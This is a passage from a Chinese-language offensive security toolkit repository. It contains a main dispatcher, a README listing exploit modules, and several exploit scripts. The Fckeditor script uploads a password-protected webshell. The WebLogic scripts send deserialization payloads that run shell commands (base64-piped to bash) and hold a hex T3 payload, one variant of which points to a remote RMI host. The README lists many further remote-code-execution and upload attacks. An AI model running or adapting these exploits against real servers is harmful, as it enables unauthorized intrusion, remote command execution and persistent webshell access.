51 | print('[+]开始检测-Fckeditor<=2.4版本简单文件上传。asp[+]')
52 | url = URL + '/editor/filemanager/browser/default/connectors/test.html'
53 | user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
54 | headers = {"User-Agent": user_agent,"Upgrade-Insecure-Requests": "1"}
55 | verify_response = requests.get(url, headers=headers)
56 | shellname = gen_shell()
57 | if verify_response.status_code == 200:
58 | print('存在有风险的上传页面:'+url)
59 | try:
60 | url = URL + '/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=/'
61 | pwd = sys.argv[0] # 获取当前文件夹的路径
62 | m = MultipartEncoder(fields={'NewFile': (f'{shellname}.asa', open(f'{pwd}\\..\\fckeditor\\shell.asa', 'rb'), 'application/octet-stream')})
63 | headers={'Content-Type': m.content_type,
64 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36',
65 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
66 | 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'
67 | }
68 | r = requests.post(url, data=m, headers=headers)
69 | print('上传shell成功!')
70 | try:
71 | aim_url = geturl(URL)
72 | URL = re.match('http://(.*?)/',URL).group()
73 | print('Shell地址为:'+URL + aim_url+shellname+'.asa')
74 | print('shell密码为:gutf987y97y97。')
75 | except Exception:
76 | print('获取上传路径失败,shell名为:'+shellname+'.asa')
77 | print('shell密码为:gutf987y97y97。')
78 | except Exception:
79 | print('上传shell发生错误。')
80 | else:
81 | print('未发现该页面:'+url)
82 | print('[+]检测结束-Fckeditor<=2.4版本简单文件上传。[+]')
83 | print('\n')
84 |
85 |
86 | if __name__ == "__main__":
87 | attack()
88 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # vulnerability-list
2 |
3 | 常见漏洞快速检测,目前包含以下漏洞的检测。
4 | 测试环境为win10,python3。
5 | 使用前需安装相关库:py -3 -m pip install -r requirements.txt
6 | 有问题可提issues,最好附上报错截图。
7 |
8 | 已发现的BUG:
9 |
10 | 1. 有些漏洞的判断依据为网页返回信息,但部分网站设置了统一的错误页面,如统一的404页面,因此造成误报。后续针对此类问题通用的解决方式是显示返回页面的大小。
11 | 2. 有些地方有渣渣的硬编码,比如路径什么的,导致不同环境下可能会报错,遇到这样的问题,使用单独的脚本进行测试,或者自己改一下路径,有时间的话会处理一下。
12 |
13 | ## Tomcat
14 |
15 | - CVE_2017_12615 / CVE_2017_12617
16 | - tomcat_weakpassword
17 | - example_vulnerability(检测tomcat的examples等目录是否存在)
18 | - CNVD-C-2019-48814/CVE-2020-1938 #Apache Tomcat文件包含 参考:
19 |
20 | > moon.py -u tomcat
21 |
22 | ## Fckeditor
23 |
24 | - 获取版本及常见上传页面检测
25 | - fck<=2.4版本上传直接上传asa文件getshell
26 |
27 | > moon.py -u fck
28 |
29 | ## Weblogic
30 |
31 | - CVE_2017_10271 # 利用方法参考:
32 | - weblogic_ssrf_cve-2014-4210
33 | - weblogic_weakpassword
34 | - CVE-2018-2628 # Author:xxlegend
35 | - CNVD-C-2019-48814
36 | - CVE-2019-2725 # 参考:
37 |
38 | > moon.py -u weblogic
39 |
40 | ## IP归属查询
41 |
42 | - 能简单查一下IP的归属地
43 |
44 | > moon.py -u ip
45 |
46 | ## IIS
47 |
48 | - 短文件名泄露 #来自 lijiejie/IIS_shortname_Scanner
49 |
50 | > moon.py -u iis
51 |
52 | ## Docker
53 |
54 | - docker_daemon_api未授权访问
55 |
56 | > moon.py -u docker
57 |
58 | ## Redis
59 |
60 | - redis未授权访问
61 |
62 | > moon.py -u redis or moon.py -u redis xx.xx.xx.xx:xxxx
63 |
64 | ## Zabbix
65 |
66 | - zabbix_sql_CVE_2016_10134 #有参考独自等待的脚本
67 |
68 | > moon.py -u zabbix
69 |
70 | ## Navigate
71 |
72 | - navigate_Unauthenticated_Remote_Code_Execution #利用方法参考
73 |
74 | > moon.py -u navigate
75 |
76 | ## Gatepass
77 |
78 | - Gate Pass Management System 2.1 - 'login' SQL Injection # 参考
79 |
80 | > moon.py -u gatepass
81 |
82 | ## Jboss
83 |
84 | - admin-console
85 | - Checking Struts2
86 | - Checking Servlet Deserialization
87 | - Checking Application Deserialization
88 | - Checking Jenkins
89 | - Checking web-console
90 | - Checking jmx-console
91 | - JMXInvokerServlet
92 | - 此模块调用的是 # jexboss 使用此模块时,建议在微软新推出的terminal中使用,或者直接下载jexboss进行测试
93 |
94 | > moon.py -u jboss
95 |
96 | ## Kindeditor
97 |
98 | - kindeditor<=4.1.5文件上传漏洞
99 |
100 | > moon.py -u kindeditor
101 |
102 | ## Drupal
103 |
104 | - Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
105 | - Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600) #
106 |
107 | > moon.py -u drupal
108 |
109 | ## Thinkphp
110 |
111 | - thinkphp_before5_0_23_rce
112 | - thinkphp5_inj_info
113 | - thinkphp5_x_rce
114 |
115 | > moon.py -u thinkphp
116 |
117 | ## Memcache
118 |
119 | - 未授权访问
120 |
121 | > moon.py -u memcache
122 |
123 | ## Js
124 |
125 | - js代码中敏感信息收集 # 主要参考 By Threezh1
126 |
127 | > moon.py -u js
128 |
129 | ## search_exploits
130 |
131 | - 在 exploitalert 中搜索某中间件存在的历史漏洞
132 |
133 | > moon.py -u exploits xxxxxx
134 |
135 | 
136 |
137 | ## ActiveMQ
138 |
139 | - activemq管理后台弱口令检测
140 | - CVE-2016-3088 activemq文件上传测试,这里只测试文件上传这个步骤,后续的MOVE操作请自行测试
141 |
142 | > moon.py -u activemq
143 |
144 | 请勿用于违法行为,后果自负。
145 |
--------------------------------------------------------------------------------
/moon.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import sys
3 | import tomcat.Main_tomcat
4 | import fckeditor.Main_fckeditor
5 | import weblogic.Main_weblogic
6 | import iis.Main_iis
7 | import docker_vuln.Main_docker
8 | import redis_vuln.Main_redis
9 | import zabbix_vuln.Main_zabbix
10 | import navigate_vuln.Main_navigate
11 | import gatepass_vuln.Main_gatepass
12 | import spring_vuln.Main_spring
13 | import jboss.Main_jboss
14 | import kindeditor.Main_kindeditor
15 | import durpal.Main_durpal
16 | import bf_dicts.Main_bf
17 | import thinkphp.Main_thinkphp
18 | import memcache_vuln.Main_memcache_vuln
19 | import js_find.Main_js_find
20 | import search_exploits.Main_search_exploits
21 | import activemq_vuln.Main_activemq
22 |
23 |
24 | if __name__ == "__main__":
25 |
26 | #使用说明
27 | if len(sys.argv) < 3 or sys.argv[1]=="-h":
28 | print('''
29 | 漏洞检测:
30 | userage: python -u module http://xx.xx.xx.xx:xx
31 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache actviemq
32 | IP归属查询:
33 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx
34 | modul:ip ipq
35 | Js中敏感信息收集:
36 | userage: python -u module http://xx.xx.xx.xx:xx
37 | modul:js
38 | 历史漏洞查询:
39 | modul: exploits
40 | ''')
41 |
42 | #漏洞利用
43 | elif sys.argv[1] == '-u':
44 | # 处理url末尾可能存在的/
45 | if sys.argv[3][-1] != '/':
46 | pass
47 | else:
48 | sys.argv[3] = sys.argv[3][0:-1]
49 | print('[*]目标:'+sys.argv[3])
50 |
51 | if sys.argv[2] == 'tomcat':
52 | tomcat.Main_tomcat.exec(sys.argv[3])
53 | elif sys.argv[2] == 'fck':
54 | fckeditor.Main_fckeditor.exec(sys.argv[3])
55 | elif sys.argv[2] == 'weblogic':
56 | weblogic.Main_weblogic.exec(sys.argv[3])
57 | elif sys.argv[2] == 'iis':
58 | iis.Main_iis.exec(sys.argv[3])
59 | elif sys.argv[2] == 'docker':
60 | docker_vuln.Main_docker.exec(sys.argv[3])
61 | elif sys.argv[2] == 'redis':
62 | redis_vuln.Main_redis.exec(sys.argv[3])
63 | elif sys.argv[2] == 'zabbix':
64 | zabbix_vuln.Main_zabbix.exec(sys.argv[3])
65 | elif sys.argv[2] == 'navigate':
66 | navigate_vuln.Main_navigate.exec(sys.argv[3])
67 | elif sys.argv[2] == 'gatepass':
68 | gatepass_vuln.Main_gatepass.exec(sys.argv[3])
69 | elif sys.argv[2] == 'spring':
70 | spring_vuln.Main_spring.exec(sys.argv[3])
71 | elif sys.argv[2] == 'jboss':
72 | jboss.Main_jboss.exec(sys.argv[3])
73 | elif sys.argv[2] == 'kindeditor':
74 | kindeditor.Main_kindeditor.exec(sys.argv[3])
75 | elif sys.argv[2] == 'drupal':
76 | durpal.Main_durpal.exec(sys.argv[3])
77 | elif sys.argv[2] == 'thinkphp':
78 | thinkphp.Main_thinkphp.exec(sys.argv[3])
79 | elif sys.argv[2] == 'memcache':
80 | memcache_vuln.Main_memcache_vuln.exec(sys.argv[3])
81 | elif sys.argv[2] == 'js':
82 | js_find.Main_js_find.exec(sys.argv[3])
83 | elif sys.argv[2] == 'exploits':
84 | search_exploits.Main_search_exploits.exec(sys.argv[3])
85 | elif sys.argv[2] == 'activemq':
86 | activemq_vuln.Main_activemq.exec(sys.argv[3])
87 |
88 | else:
89 | print('''
90 | 漏洞检测:
91 | userage: python -u module http://xx.xx.xx.xx:xx
92 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache activemq
93 | IP归属查询:
94 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx
95 | modul:ip ipq
96 | Js中敏感信息收集:
97 | userage: python -u module http://xx.xx.xx.xx:xx
98 | modul:js
99 | 历史漏洞查询:
100 | modul: exploits
101 | ''')
102 | elif sys.argv[1] == '-p':
103 | print('[+]检测地址:'+sys.argv[2]+sys.argv[3]+sys.argv[4])
104 | bf_dicts.Main_bf.exec(sys.argv[2],sys.argv[3],sys.argv[4])
105 |
106 | else:
107 | print('''
108 | 漏洞检测:
109 | userage: python -u module http://xx.xx.xx.xx:xx
110 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache activemq
111 | IP归属查询:
112 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx
113 | modul:ip ipq
114 | Js中敏感信息收集:
115 | userage: python -u module http://xx.xx.xx.xx:xx
116 | modul:js
117 | 历史漏洞查询:
118 | modul: exploits
119 | ''')
120 |
--------------------------------------------------------------------------------
/iis/iis_shortname_Scan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding:utf-8
3 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
4 |
5 |
6 | import sys
7 | import http.client
8 | from urllib.parse import urlparse
9 | import threading
10 | import queue
11 | import time
12 |
13 |
14 | class Scanner():
15 | def __init__(self, target):
16 | self.target = target.lower()
17 | if not self.target.startswith('http'):
18 | self.target = 'http://%s' % self.target
19 | self.scheme, self.netloc, self.path, params, query, fragment = \
20 | urlparse(target)
21 | if self.path[-1:] != '/': # ends with slash
22 | self.path += '/'
23 | self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
24 | self.files = []
25 | self.dirs = []
26 | self.queue = queue.Queue()
27 | self.lock = threading.Lock()
28 | self.threads = []
29 | self.request_method = ''
30 | self.msg_queue = queue.Queue()
31 | self.STOP_ME = False
32 | threading.Thread(target=self._print).start()
33 |
34 | def _conn(self):
35 | try:
36 | if self.scheme == 'https':
37 | conn = http.client.HTTPSConnection(self.netloc)
38 | else:
39 | conn = http.client.HTTPConnection(self.netloc)
40 | return conn
41 | except Exception as e:
42 | print('[_conn.Exception]', e)
43 | return None
44 |
45 | def _get_status(self, path):
46 | try:
47 | conn = self._conn()
48 | conn.request(self.request_method, path)
49 | status = conn.getresponse().status
50 | conn.close()
51 | return status
52 | except Exception as e:
53 | raise Exception('[_get_status.Exception] %s' % str(e) )
54 |
55 | def is_vul(self):
56 | try:
57 | for _method in ['GET', 'OPTIONS']:
58 | self.request_method = _method
59 | status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder
60 | status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder
61 | if status_1 == 404 and status_2 != 404:
62 | return True
63 | return False
64 | except Exception as e:
65 | raise Exception('[is_vul.Exception] %s' % str(e) )
66 |
67 | def run(self):
68 | for c in self.alphanum:
69 | self.queue.put( (self.path + c, '.*') ) # filename, extension
70 | for i in range(20):
71 | t = threading.Thread(target=self._scan_worker)
72 | self.threads.append(t)
73 | t.start()
74 | for t in self.threads:
75 | t.join()
76 | self.STOP_ME = True
77 |
78 | def report(self):
79 | print('-'* 64)
80 | for d in self.dirs:
81 | print('Dir: %s' % d)
82 | for f in self.files:
83 | print('File: %s' % f)
84 | print('-'*64)
85 | print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)))
86 | print('Note that * is a wildcard, matches any character zero or more times.')
87 |
88 | def _print(self):
89 | while not self.STOP_ME or (not self.msg_queue.empty()):
90 | if self.msg_queue.empty():
91 | time.sleep(0.05)
92 | else:
93 | print(self.msg_queue.get())
94 |
95 | def _scan_worker(self):
96 | while True:
97 | try:
98 | url, ext = self.queue.get(timeout=1.0)
99 | status = self._get_status(url + '*~1' + ext + '/1.aspx')
100 | if status == 404:
101 | self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext))
102 |
103 | if len(url) - len(self.path)< 6: # enum first 6 chars only
104 | for c in self.alphanum:
105 | self.queue.put( (url + c, ext) )
106 | else:
107 | if ext == '.*':
108 | self.queue.put( (url, '') )
109 |
110 | if ext == '':
111 | self.dirs.append(url + '~1')
112 | self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]')
113 |
114 | elif len(ext) == 5 or (not ext.endswith('*')): # .asp*
115 | self.files.append(url + '~1' + ext)
116 | self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]')
117 |
118 | else:
119 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
120 | self.queue.put( (url, ext[:-1] + c + '*') )
121 | if len(ext) < 4: # < len('.as*')
122 | self.queue.put( (url, ext[:-1] + c) )
123 |
124 | except queue.Empty as e:
125 | break
126 | except Exception as e:
127 | print('[Exception]', e)
128 |
129 |
130 | def attack(URL):
131 | s = Scanner(URL)
132 | if not s.is_vul():
133 | s.STOP_ME = True
134 | print('Server is not vulnerable')
135 | sys.exit(0)
136 |
137 | print('Server is vulnerable, please wait, scanning...')
138 | s.run()
139 | s.report()
140 |
141 |
142 |
143 | if __name__ == '__main__':
144 | attack()
145 |
--------------------------------------------------------------------------------
/weblogic/CNVD_C_2019_48814.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | import optparse
3 | import requests
4 | import base64
5 |
6 | '''
7 | Usage:
8 | moon.py -u weblogic http://127.0.0.1:7001
9 | 这个脚本原始出处不知道哪位大神(py2),自己改了改(py3)。base64有个坑. bytes 和 str 转换python2和3有点区别。
10 | 本脚本可直接执行命令。
11 |
12 | CNVD-C-2019-48814
13 |
14 | 漏洞描述:
15 | WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。
16 |
17 | 影响范围:
18 | WebLogic 10.X
19 | WebLogic 12.1.3
20 |
21 | http://192.168.1.126:7001/_async
22 | 403存在,404不存在
23 |
24 | http://192.168.1.126:7001/_async/AsyncResponseService
25 | 200存在,404不存在
26 |
27 | 修复:
28 | 打补丁
29 | 1、删除该wls9_async_response.war包并重启webLogic:
30 | 该war包具体路径如下:
31 | WebLogic 10.3.*:
32 | Middleware/wlserver_10.3/server/lib/bea_wls9_async_response.war
33 | WebLogic 12.1.3:
34 | Middleware/Oracle_Home/oracle_common/modules/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war
35 | 2、 通过访问策略控制禁止 /_async/* 路径的URL访问。
36 |
37 | # 参考:
38 | ttps://www.jianshu.com/p/c4982a845f55?utm_campaign=hugo&utm_medium=reader_share&utm_content=note&utm_source=weixin-timeline&from=timeline
39 | https://mp.weixin.qq.com/s/xJAP11xxGpR9CCVJ-SHeLw
40 | https://mp.weixin.qq.com/s?__biz=MzA4MDk3NzQ2OA==&mid=2454386939&idx=1&sn=2201c2986bba691c97833703ab38ee6a&chksm=882253a8bf55dabe9287d189b6eab43835fb5e11d573409818bd53c03449695da1299cdaaa7f&scene=0&xtrack=1&key=2b014a6820a1af4646355cdad083dd430a0a72940aaabd4c5d122740e2e70fe4311cf3b26341a5c67db5680b48dbb2cc9929bb2c752762eefc55cbbe9dce6687e4ab70f7680a5d816dfca875600660b6&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou
41 | https://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247484258&idx=1&sn=f2213aec957aeb577c2d8f25bca2edd6&chksm=fa177fa1cd60f6b7634c1502b81a03c081827e9c3edb6151d75119433eafa91b080ce5549bf5&scene=0&xtrack=1&key=58a327fab9b03b4d45c412094df8e30eb0c8121282d89468600594c7b8c0bac551026570f083017558e66e639c43d0bad25d83481ed6e3122cf8f32c49b070a883b6f41e8b7f52597921748516633fe3&ascene=1&uin=ODcyMzk1NTA2&devicetype=Windows+10&version=62060739&lang=zh_CN&pass_ticket=3hixJwwmL0fh6mFu2UWxBuGjTXpTeFPr%2F%2FQhP2o2XMuWI9I%2BWoiRKbL5OwDvGfou
42 |
43 | '''
44 |
45 | headers = {'Content-type': 'text/xml'}
46 | uri = '/wls-wsat/CoordinatorPortType'
47 | linux_poc = '''
48 |
49 | demoAction
50 | hello
51 |
52 |
53 |
54 |
55 |
56 | /bin/sh
57 |
58 |
59 | -c
60 |
61 |
62 | %s
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | '''
75 | win_poc = '''
76 |
77 | demoAction
78 | hello
79 |
80 |
81 |
82 |
83 |
84 | cmd
85 |
86 |
87 | /c
88 |
89 |
90 | %s
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 | '''
103 |
104 |
105 | def attack(URL):
106 | print('[*]开始检测-Weblogic-CNVD-C-2019-48814。[*]')
107 | cmd = str('whoami')
108 | base64cmd=base64.b64encode(cmd.encode('utf-8'))
109 | linux_poccmd = 'echo %s|base64 -d|bash' % base64cmd.decode('utf-8')
110 | linux_poc2 = linux_poc % linux_poccmd
111 | win_poc2 = win_poc % cmd
112 | url2 = URL + '/_async/AsyncResponseService'
113 | try:
114 | r1 = requests.post(url2,headers=headers,data=linux_poc2,timeout=7)
115 | r2 = requests.post(url2,headers=headers,data=win_poc2,timeout=7)
116 | if r1.status_code == 202 or r2.status_code == 202:
117 | print('[+]发现 CNVD-C-2019-48814! 请使用exp确认。')
118 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
119 | print('\n')
120 | else:
121 | print('[-]未发现 CNVD-C-2019-48814!')
122 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
123 | print('\n')
124 | except requests.ReadTimeout:
125 | print('[-]未发现 CNVD-C-2019-48814! Read timeout')
126 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
127 | print('\n')
128 | except Exception:
129 | print('[-]未发现 CNVD-C-2019-48814! some error')
130 | print('[*]检测结束-Weblogic-CNVD-C-2019-48814。[*]')
131 | print('\n')
132 |
133 | if __name__ == '__main__':
134 | attack()
--------------------------------------------------------------------------------
/jboss/_updates.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | Module for managing updates to the JexBoss
4 | https://github.com/joaomatosf/jexboss
5 |
6 | Copyright 2013 João Filho Matos Figueiredo
7 |
8 | Licensed under the Apache License, Version 2.0 (the "License");
9 | you may not use this file except in compliance with the License.
10 | You may obtain a copy of the License at
11 |
12 | http://www.apache.org/licenses/LICENSE-2.0
13 |
14 | Unless required by applicable law or agreed to in writing, software
15 | distributed under the License is distributed on an "AS IS" BASIS,
16 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
17 | See the License for the specific language governing permissions and
18 | limitations under the License.
19 | """
20 |
21 | RED = '\x1b[91m'
22 | RED1 = '\033[31m'
23 | BLUE = '\033[94m'
24 | GREEN = '\033[32m'
25 | BOLD = '\033[1m'
26 | NORMAL = '\033[0m'
27 | ENDC = '\033[0m'
28 |
29 | import jexboss
30 | from sys import version_info
31 | import os
32 | import shutil
33 | from zipfile import ZipFile
34 | import traceback
35 | import logging, datetime
36 | logging.captureWarnings(True)
37 | FORMAT = "%(asctime)s (%(levelname)s): %(message)s"
38 | logging.basicConfig(filename='jexboss_'+str(datetime.datetime.today().date())+'.log', format=FORMAT, level=logging.INFO)
39 |
40 |
41 |
42 | global gl_http_pool
43 |
44 |
45 | def set_http_pool(pool):
46 | global gl_http_pool
47 | gl_http_pool = pool
48 |
49 |
50 | def auto_update():
51 | """
52 | Download and deploy the latest version
53 | :return: True if successfully updated
54 | """
55 | url = 'https://github.com/joaomatosf/jexboss/archive/master.zip'
56 |
57 | # backup of prior version7
58 | if os.path.exists('old_version'):
59 | shutil.rmtree('old_version')
60 | shutil.copytree(".", "." + os.path.sep + "old_version")
61 |
62 | # download and extract of new version
63 | jexboss.print_and_flush(GREEN + " * Downloading the new version from %s." %url +ENDC )
64 | r = gl_http_pool.request('GET', url)
65 | if r.status != 200:
66 | jexboss.print_and_flush(RED + " * Error: Could not complete the download of the new version. Check your internet connection." + ENDC)
67 | return False
68 | with open('master.zip', 'wb') as f:
69 | f.write(r.data)
70 | z = ZipFile('master.zip', 'r')
71 | jexboss.print_and_flush(GREEN + " * Extracting new version..." +ENDC)
72 | z.extractall(path='.')
73 | z.close()
74 | os.remove('master.zip')
75 | path_new_version = '.' + os.path.sep + 'jexboss-master'
76 | jexboss.print_and_flush(GREEN + " * Replacing the current version with the new version..." + ENDC)
77 | for root, dirs, files in os.walk(path_new_version):
78 | for file in files:
79 | old_path = root.replace(path_new_version, '.') + os.path.sep
80 | old_file = root.replace(path_new_version, '.') + os.path.sep + file
81 | new_file = os.path.join(root, file)
82 |
83 | if not os.path.exists(old_path):
84 | os.makedirs(old_path)
85 |
86 | shutil.move(new_file, old_file)
87 | # remove extracted directory of the new version
88 | shutil.rmtree('.'+os.path.sep+'jexboss-master')
89 |
90 | return True
91 |
92 |
93 | def check_updates():
94 | """
95 | Checks if there is new version available
96 | :return: boolean if there updates
97 | """
98 | url = 'http://joaomatosf.com/rnp/releases.txt'
99 | jexboss.print_and_flush(BLUE + " * Checking for updates in: %s **\n" % url + ENDC)
100 | header = {"User-Agent": "Checking for updates"}
101 |
102 | try:
103 | r = gl_http_pool.request('GET', url, redirect=False, headers=header)
104 | except:
105 | jexboss.print_and_flush(RED + " * Error: Failed to check for updates ...\n" + ENDC)
106 | logging.warning("Failed to check for updates.", exc_info=traceback)
107 | return False
108 |
109 | if r.status != 200:
110 | jexboss.print_and_flush(RED + " * Error: could not check for updates ...\n" + ENDC)
111 | logging.warning("Failed to check for updates. HTTP Code: %s" % r.status)
112 | return False
113 | else:
114 | current_version = jexboss.__version__
115 | link = 'https://github.com/joaomatosf/jexboss/archive/master.zip'
116 | date_last_version = ''
117 | notes = []
118 | # search for new versions
119 | resp = str(r.data).replace('\\n','\n')
120 | for line in resp.split('\n'):
121 | if "#" in line:
122 | continue
123 | if 'last_version' in line:
124 | last_version = line.split()[1]
125 | elif 'date:' in line:
126 | date_last_version = line.split()[1]
127 | elif 'link:' in line:
128 | link = line
129 | elif '* ' in line:
130 | notes.append(line)
131 | elif 'version:' in line and 'last_' not in line:
132 | break
133 | # compare last_version with current version
134 | tup = lambda x: [int(y) for y in (x + '.0.0.0').split('.')][:3]
135 | if tup(last_version) > tup(current_version):
136 | jexboss.print_and_flush (
137 | GREEN + BOLD + " * NEW VERSION AVAILABLE: JexBoss v%s (%s)\n" % (last_version, date_last_version) + ENDC +
138 | GREEN + " * Link: %s\n" % link +
139 | GREEN + " * Release notes:")
140 | for note in notes:
141 | jexboss.print_and_flush (" %s" % note)
142 | return True
143 | else:
144 | return False
--------------------------------------------------------------------------------
/weblogic/CVE_2018_2628.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # 原作者: xxlegend
3 | import socket
4 | import time
5 | import re
6 | import sys
7 |
8 | VUL=['CVE-2018-2628']
9 | #remote ip changed to :127.0.0.1
10 | PAYLOAD=['ACED0005737D00000001001D6A6176612E726D692E61637469766174696F6E2E416374697661746F72787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707729000A556E69636173745265660000000005A2000000005649E3FD00000000000000000000000000000078']
11 | #remote ip:104.251.228.50
12 | #PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
13 | VER_SIG=['\\$Proxy[0-9]+']
14 |
15 | def t3handshake(sock,server_addr):
16 | sock.connect(server_addr)
17 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
18 | time.sleep(1)
19 | sock.recv(1024)
20 | print 'handshake successful'
21 |
22 | def buildT3RequestObject(sock,port):
23 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
24 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
25 | data3 = '1a7727000d3234322e323134'
26 | data4 = '2e312e32353461863d1d0000000078'
27 | for d in [data1,data2,data3,data4]:
28 | sock.send(d.decode('hex'))
29 | time.sleep(2)
30 | print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
31 |
32 | def sendEvilObjData(sock,data):
